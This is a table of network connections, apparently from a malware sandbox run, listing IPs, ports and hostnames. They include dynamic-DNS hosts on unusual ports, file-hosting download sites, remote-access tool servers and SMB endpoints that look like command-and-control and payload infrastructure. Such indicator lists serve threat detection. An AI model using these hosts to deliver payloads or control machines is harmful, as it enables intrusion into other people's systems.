| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| US | 8.8.8.8:53 | 104.208.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.18.243.136.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 136.243.18.119:443 | chat.ammyy.com | tcp |
| DE | 136.243.18.119:443 | chat.ammyy.com | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | ticket.ammyy.com | udp |
| DE | 136.243.18.119:80 | ticket.ammyy.com | tcp |
| DE | 136.243.18.119:80 | ticket.ammyy.com | tcp |
| DE | 136.243.18.119:80 | ticket.ammyy.com | tcp |
| DE | 136.243.18.119:80 | ticket.ammyy.com | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| DE | 136.243.18.119:80 | ticket.ammyy.com | tcp |
| DE | 136.243.18.119:80 | ticket.ammyy.com | tcp |
| DE | 136.243.18.119:80 | ticket.ammyy.com | tcp |
| DE | 136.243.18.119:80 | ticket.ammyy.com | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| DE | 136.243.18.119:80 | ticket.ammyy.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | center.onthewifi.com | udp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | retghrtgwtrgtg.bounceme.net | udp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:7020 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | datastream.myvnc.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 136.243.18.119:80 | ticket.ammyy.com | tcp |
| DE | 136.243.18.119:80 | ticket.ammyy.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| DE | 136.243.18.119:80 | ticket.ammyy.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| GB | 216.58.208.104:443 | ssl.google-analytics.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | center.onthewifi.com | udp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| US | 107.175.229.139:8087 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| US | 8.8.8.8:53 | retghrtgwtrgtg.bounceme.net | udp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:7020 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | datastream.myvnc.com | udp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | 138.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api3.check-data.xyz | udp |
| US | 8.8.8.8:53 | www.testupdate.info | udp |
| US | 44.236.198.167:443 | api3.check-data.xyz | tcp |
| KZ | 185.22.66.217:80 | www.testupdate.info | tcp |
| US | 107.175.229.139:8087 | tcp | |
| KZ | 185.22.66.217:80 | www.testupdate.info | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| US | 8.8.8.8:53 | 15.39.65.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rfiles1.tracemonitors.com | udp |
| US | 8.8.8.8:53 | rfiles3.tracemonitors.com | udp |
| RU | 80.78.240.92:443 | rfiles3.tracemonitors.com | tcp |
| RU | 80.78.240.92:443 | rfiles3.tracemonitors.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | 92.240.78.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients79.google.com | udp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| NL | 142.250.179.163:443 | update.googleapis.com | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | datalake.abuse.ch | udp |
| DE | 178.162.202.48:443 | datalake.abuse.ch | tcp |
| DE | 178.162.202.48:443 | datalake.abuse.ch | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | api4.tracemonitors.com | udp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| US | 44.236.198.167:443 | api4.tracemonitors.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | clients79.google.com | udp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 178.162.202.48:443 | datalake.abuse.ch | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| KZ | 185.22.66.161:80 | www.testupdate.info | tcp |
| KZ | 185.22.66.161:80 | www.testupdate.info | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 107.175.229.139:8087 | tcp | |
| US | 8.8.8.8:53 | 161.66.22.185.in-addr.arpa | udp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 194.67.87.38:80 | 133455789.xyz | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | rfiles5.tracemonitors.com | udp |
| RU | 80.78.240.92:80 | rfiles5.tracemonitors.com | tcp |
| RU | 80.78.240.92:443 | rfiles5.tracemonitors.com | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| US | 8.8.8.8:53 | 38.87.67.194.in-addr.arpa | udp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| RU | 62.173.141.116:445 | tcp | |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 116.141.173.62.in-addr.arpa | udp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | center.onthewifi.com | udp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| US | 8.8.8.8:53 | retghrtgwtrgtg.bounceme.net | udp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:7020 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | datastream.myvnc.com | udp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 62.173.141.114:445 | tcp | |
| US | 8.8.8.8:53 | 114.141.173.62.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 185.172.128.100:80 | 185.172.128.100 | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 129.153.80.87:8855 | tcp | |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| DE | 138.201.120.172:15648 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
